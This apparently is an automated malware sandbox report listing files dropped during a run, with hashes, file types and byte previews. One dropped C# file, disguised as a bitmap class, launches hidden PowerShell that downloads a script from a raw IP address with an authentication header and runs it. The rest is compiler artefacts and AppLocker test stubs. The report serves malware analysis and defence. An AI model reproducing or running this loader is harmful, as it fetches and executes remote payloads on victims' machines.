                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP................F..&..;!.\DOL.............5.......C:\Users\user\AppData\Local\Temp\RES61E6.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.n.j.g.a.w.j.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                          C:\Users\user\AppData\Local\Temp\RES63AB.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Tue Dec 24 02:42:26 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1336
                                                          Entropy (8bit):4.012672536540612
                                                          Encrypted:false
                                                          SSDEEP:24:Hwm9ISVIrDHZwKTF9mfwI+ycuZhNtakS7PNnqSSd:uSVIrDiKTfmo1ulta3xqSC
                                                          MD5:A3821600B25DD90710D0B38B5B7F7C42
                                                          SHA1:9CBD84B61D2BB2A3C6556B0A64E5B9CE852AB28C
                                                          SHA-256:61BCDDB3917ED94DA838A3C6148F19B9E4669BAC70A35F05F27B6913FC5F1DF3
                                                          SHA-512:C728A9F778454235CF6E9F2F237A1E0B58F0B58A061673CC537B900A9DCDAF6B3A02D6B6A6725AFEFD3E06947D8A5F927046C5635A832B8EC38CF6C406FF2342
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP..................ZL.?.:.......O.'..........5.......C:\Users\user\AppData\Local\Temp\RES63AB.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.h.y.t.d.s.x.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                          C:\Users\user\AppData\Local\Temp\RES6C65.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:28 2024, 1st section name ".debug$S"
                                                          Category:modified
                                                          Size (bytes):1332
                                                          Entropy (8bit):4.019360706417851
                                                          Encrypted:false
                                                          SSDEEP:24:HEFzW91r6iZ3HZFwKTF9mfwI+ycuZhN1akSzPNnqS2d:FXZ35mKTfmo1ul1a35qSG
                                                          MD5:C82F4161023C4C3523F8E4A12724C5DD
                                                          SHA1:F91401046BD9F8AF0355D612BF61BA3C0DF2564E
                                                          SHA-256:FFEC563234A7E9797BB2821E1699F6800D58C9BDC163F612298DD3FD66025531
                                                          SHA-512:6E3792D5CF2A0CFF3F2534AC7B9503C92EAE1043C2B764474713F45B7AF719164D26B5ED93CA198AEF3AA382166AD56ACC1B5CEBD6C645DF8146462F19026A36
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP...............~..!.._.0...'.2..........5.......C:\Users\user\AppData\Local\Temp\RES6C65.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.h.g.z.z.q.q.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                          C:\Users\user\AppData\Local\Temp\RES7946.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:31 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):3.987032391524883
                                                          Encrypted:false
                                                          SSDEEP:24:H9FzW9Aocl2HHwKTF9mfwI+ycuZhNtbakSEUPNnqS2d:ToU2wKTfmo1ultba3E0qSG
                                                          MD5:4C69CA742E22D1D122115FBB4B10C19C
                                                          SHA1:1054F7F57A54D76EA3816A2114B6F10A4D740D5B
                                                          SHA-256:4D5921D33351ABA36C0498AADAFFE12CB05E5C0D33461F517CE7DC08F61CE351
                                                          SHA-512:F8E780B3D258C89A3AF9A498478D99FAD0EBE566B3210643D75C78463CAACE0BDCFED507CDEA3485B0F9EBEEBB3400F43FA66EF56830C9C20E46CDDE9B7FDD9D
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........Q....c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP....................9....{...i..w..........5.......C:\Users\user\AppData\Local\Temp\RES7946.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.e.o.0.1.y.5.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                          C:\Users\user\AppData\Local\Temp\RES7C53.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:32 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):4.016875264788155
                                                          Encrypted:false
                                                          SSDEEP:24:H4FzW91rdb6DHnwKTF9mfwI+ycuZhN2akSuPNnqS2d:pdb6DQKTfmo1ul2a3yqSG
                                                          MD5:8849FB831F4FD07BE6AE1DF9BF796983
                                                          SHA1:2760547FEE0C0F55260DE6FFEC154ACD71FB034E
                                                          SHA-256:ECA35E719E9F72FF3F8978339F9EE52B105386541C022DEDAD38ACCA30CBAB57
                                                          SHA-512:ED915CF59380198456A906B851C9FDF7CAFC82DD0BD8817F111AEA76ED1C3ABBB188A69E325CB19EC5849ED4C39F9467462C653AC570A2C14FC250E2D1AE588A
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP.................8vKn.U....3~............5.......C:\Users\user\AppData\Local\Temp\RES7C53.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.j.t.z.e.y.v.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                          C:\Users\user\AppData\Local\Temp\RES7CE0.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:32 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):4.00954202382923
                                                          Encrypted:false
                                                          SSDEEP:24:H4FzW91rluSH+wKTF9mfwI+ycuZhNiakSaPNnqS2d:pcS9KTfmo1ulia3WqSG
                                                          MD5:FA84B5CDF69D48706AACB8CC61368BF8
                                                          SHA1:AD3514ECA1F1DB1BCD5339000957A68DD934F1F3
                                                          SHA-256:C2B3F71AE0DE3219CB0788B653A76EDDFD189A2892A2FBE996F997DCCE957A6B
                                                          SHA-512:0A0CA01194C61BE0BD85319A5F99ACFD9A89E78F6AAE740CB9CE0ED9B21A91045248357C115472DED4565D1EF6C464FD0B2BCC24CAB0CD4A80B3066410732A21
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP................?.A:...A._..............5.......C:\Users\user\AppData\Local\Temp\RES7CE0.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.k.k.y.4.h.e.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                          C:\Users\user\AppData\Local\Temp\RES83D5.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:34 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):3.996655664312536
                                                          Encrypted:false
                                                          SSDEEP:24:HmFzW91r22EHdmWwKTF9mfwI+ycuZhN4GakS5XPNnqS2d:LZE9m1KTfmo1ulHa3rqSG
                                                          MD5:C782A694098812C37E7D1DD0BCEF9190
                                                          SHA1:85C55A2D05F632806D109A663609DC2478FE5D09
                                                          SHA-256:F618461A093B1E4819626C49F79BFD679348BB50CB27D1F9DB4BD5B06C71E3AF
                                                          SHA-512:B56E0ECD9EA9E90570AC632426D569E4100890764C246599CD099787F43E0051400FA03A9447F1CC87262639D2079B05D6FF021BEA40AC2343B8D967E2C0DBD0
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP................56..f..j..~.(2...........5.......C:\Users\user\AppData\Local\Temp\RES83D5.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.e.j.l.a.b.p.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                          C:\Users\user\AppData\Local\Temp\RES9337.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Tue Dec 24 02:42:38 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1336
                                                          Entropy (8bit):3.9821207591180188
                                                          Encrypted:false
                                                          SSDEEP:24:Hsm9INGP/mMHW5QwKTF9mfwI+ycuZhNpGakSIXPNnqSSd:ykmMI/KTfmo1ulUa34qSC
                                                          MD5:1260E28580DE709B67D50A8494865613
                                                          SHA1:F3A3C9E2F22CED4FFD87410E87330F411470193A
                                                          SHA-256:67F21DC629990F9091A907F0D31EF3EE3C6CA8331EF5AA81AEB98413B4B69C1B
                                                          SHA-512:717D711CC90BB7A54891917E9F1A20F7AD28E8BDB588F063A0518E152674B50B36BDFC3E8A4E2BAE857B462D4A0A63DBDAA2D9E523BA07886DED1EAE8F815C15
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP......................N2.hL.wl/.H7..........5.......C:\Users\user\AppData\Local\Temp\RES9337.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.c.v.5.n.2.s.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ed11iwa.iiv.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azf21gls.aao.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gatthzx5.ml3.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hrlj14y4.ajp.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i55rjruc.al1.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irmmrya2.xxv.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0rat2d0.dbm.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhq11k1x.zib.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.090908747402381
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCsbak7YnqqPsUPN5Dlq5J:+RI+ycuZhNtbakSEUPNnqX
                                                          MD5:D11B39ABEB8CC4C07B9DDA106989B977
                                                          SHA1:3086D2AAE89A88698790A8863E76D0A1F94CC91B
                                                          SHA-256:3D0BD6CC776721A40F7049FAAC1A77B477E8AB1F43AC0DAD6DE31A23B6E0AEC6
                                                          SHA-512:97A5AD436AB1BEA9D8A82A816BAEE8D5FD23392635F16641081DD2AA74E3ADE0AA463137CD5F84BA93A2A62EFDD6DCFB549D89690E696895B27EF374365F8311
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.e.o.0.1.y.5.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.e.o.0.1.y.5.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.0.cs

                                                          Download File
                                                          Process:C:\Windows\System32\loaddll32.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):724
                                                          Entropy (8bit):4.782753816020807
                                                          Encrypted:false
                                                          SSDEEP:12:V/DTLDauCiQnFOd6FTtf8FkxmaTqTy2dn7+o0zNLmiRSLFUQCL:JjbCiKFc6FowJ2xaoiN3RGUNL
                                                          MD5:99382B41100168F76538CFBD7C420DE5
                                                          SHA1:8C4097E9A57C6CD198C39DC42EF913F14263D211
                                                          SHA-256:096719AB4C6A1F5BAE559122034A423DBCEAF015653FD567263704015D2A2099
                                                          SHA-512:225CEE697ACB1972EBCB1C4E131EA254E6C6D60BE0DA0476D99FA4275C92FBEB27556B74540AD15B007E23B09F621805F4C759D9701BAAD386C9A179C58332FD
                                                          Malicious:false
                                                          Preview:.using System;.using System.Diagnostics;..namespace iviewers.{. class BitmapColorPixel. {. public static void StartBitmap(). {. ProcessStartInfo startInfo = new ProcessStartInfo. {. FileName = "powershell",. Arguments = @"-Command ""iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex""",. WindowStyle = ProcessWindowStyle.Hidden. };.. using (Process p = Process.Start(startInfo)). {. p.WaitForExit();. }.. Environment.Exit(0);. }. }.}.

                                                          C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline

                                                          Download File
                                                          Process:C:\Windows\System32\loaddll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):5.011723342765393
                                                          Encrypted:false
                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1RCHyg4E2J5xAIfh6GA98FaiQCIFRVRMxTPICHyg4E2J5xAI/:pAu+H2LnCHhJ23fptkHzxszICHhJ23f/
                                                          MD5:11E31F2929D066FB77CD465C714737AA
                                                          SHA1:A4E975F2391898D35E117DC8409CBD72D2CB88E5
                                                          SHA-256:86A10510EA8B20CFD91FC5341E39474071B934268EA5D2F6C76D6975D53FA446
                                                          SHA-512:5FAFA5C7C38065B42ECF9A6CF3700099EC921B68BB074F6299065D6EAA45E7E278740CE41A2D8C633A26166490C14D09D20DE0BBD99719880E693163189495BC
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):2.9559844346579074
                                                          Encrypted:false
                                                          SSDEEP:48:6Z1gJHpAUH0Jjlbo7jhIB/4DMPvffv1ultba3E0q:PAUB790rP34nbKE
                                                          MD5:DC08E7D337D21A2AA13FC3B67E1E7F42
                                                          SHA1:8E6D590671E58537661136C24DA85BA0DF61D3B5
                                                          SHA-256:E06C2AE50CAEC278ABD527E3C896180B2430AC2F2F976A7B82FA7BE757936D17
                                                          SHA-512:C78CD21C04E681D4AB356883FBDDD06E580E7844B5500BABDFD96A15895CD2D7461C4807F5E03948275AD32DEC5CC3C2B741E814073645FC57955CDDD5C6C792
                                                          Malicious:true
